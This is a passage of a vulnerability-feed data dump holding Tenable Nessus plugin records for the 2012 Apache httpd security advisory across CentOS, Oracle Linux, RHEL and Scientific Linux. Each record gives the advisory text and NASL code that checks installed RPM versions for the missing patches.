A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.", "modified": "2018-11-10T00:00:00", "published": "2012-02-16T00:00:00", "id": "CENTOS_RHSA-2012-0128.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57960", "title": "CentOS 6 : httpd (CESA-2012:0128)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0128 and \n# CentOS Errata and Security Advisory 2012:0128 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57960);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/10 11:49:29\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50494, 50802, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"CentOS 6 : httpd (CESA-2012:0128)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-February/018433.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?44f56a29\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-devel-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-manual-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"httpd-tools-2.2.15-15.el6.centos.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"mod_ssl-2.2.15-15.el6.centos.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:16:46", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2012:0128 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.", "modified": "2018-07-18T00:00:00", "published": "2013-07-12T00:00:00", "id": "ORACLELINUX_ELSA-2012-0128.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68458", "title": "Oracle Linux 6 : httpd (ELSA-2012-0128)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0128 and \n# Oracle Linux Security Advisory ELSA-2012-0128 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68458);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 50802, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"Oracle Linux 6 : httpd (ELSA-2012-0128)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0128 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. 
An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-February/002606.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"httpd-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-devel-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-manual-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"httpd-tools-2.2.15-15.0.1.el6_2.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mod_ssl-2.2.15-15.0.1.el6_2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ssl\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": 
"2019-01-16T20:13:09", "bulletinFamily": "scanner", "description": "Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. 
A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.", "modified": "2018-12-20T00:00:00", "published": "2012-02-14T00:00:00", "id": "REDHAT-RHSA-2012-0128.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57931", "title": "RHEL 6 : httpd (RHSA-2012:0128)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0128. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57931);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2018/12/20 11:08:45\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50494, 50802, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"RHEL 6 : httpd (RHSA-2012:0128)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0053\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-1391.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0128\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0128\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-debuginfo-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-devel-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-manual-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n if 
(rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n }\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:14:30", "bulletinFamily": "scanner", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via a\nprevious update) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. 
A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.", "modified": "2018-12-31T00:00:00", "published": "2012-08-01T00:00:00", "id": "SL_20120221_HTTPD_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=61261", "title": "Scientific Linux Security Update : httpd on SL5.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61261);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/12/31 11:35:00\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via a\nprevious update) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. 
Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1203&L=scientific-linux-errata&T=0&P=874\n script_set_attribute(\n attribute:\"see_also\",\n 